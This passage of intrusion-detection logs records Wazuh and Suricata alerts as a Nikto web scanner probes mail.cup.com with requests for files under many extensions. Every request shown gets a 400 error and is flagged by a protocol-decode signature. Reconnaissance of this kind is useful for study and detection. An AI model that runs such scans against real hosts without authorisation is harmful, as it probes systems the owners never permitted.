character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.idc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.351261+0000","flow_id":"455618704595240.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46946","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.idc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.353104+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":6,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.13693","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.353104+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46948,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.access\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.353104+0000","flow_id":"1306962827043002.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46948","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.access","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.355207+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":7,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.15237","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.355207+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46950,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.355207+0000","flow_id":"1369948522440834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46950","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp+","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.358195+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":8,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.16777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.358195+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46952,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.de\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.358195+0000","flow_id":"583080449044546.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46952","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.de","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.361389+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":9,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.18311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.361389+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46954,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.en\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.361389+0000","flow_id":"570105352846820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46954","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.en","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.365743+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":10,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.19845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.365743+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46956,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.365743+0000","flow_id":"776469941489987.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46956","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.367902+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":11,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.21387","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.367902+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46958,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.et\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.367902+0000","flow_id":"829521377532493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46958","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.et","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.370560+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":12,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.22921","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.370560+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46960,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.370560+0000","flow_id":"380826144121724.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46960","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cmd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.372779+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":13,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.24457","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.372779+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46962,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.372779+0000","flow_id":"319004384865496.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46962","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.x-shop","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.375251+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":14,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.25999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.375251+0000\",\"flow_id\":1.67220255094931e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46964,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.375251+0000","flow_id":"1672202550949310.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46964","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.377295+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":15,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.27541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.377295+0000\",\"flow_id\":2.17615683359514e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46966,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.map\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.377295+0000","flow_id":"2176156833595140.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46966","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.map","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.379849+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":16,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.29083","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.379849+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46968,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.379849+0000","flow_id":"1414354189338696.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46968","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Big5","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.382662+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":17,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.30623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.382662+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46970,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.382662+0000","flow_id":"268736087642508.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46970","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.10:100","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.385406+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":18,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.32165","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.385406+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46972,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.385406+0000","flow_id":"1931339402763667.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46972","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nsf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.388338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":19,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.33703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.388338+0000\",\"flow_id\":2192726817433916,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46974,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.render_warning_screen\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.388338+0000","flow_id":"2192726817433916.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46974","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.render_warning_screen","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.390615+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":20,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.35277","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.390615+0000\",\"flow_id\":769894346584834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46976,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.phtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.390615+0000","flow_id":"769894346584834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46976","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.phtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.393834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 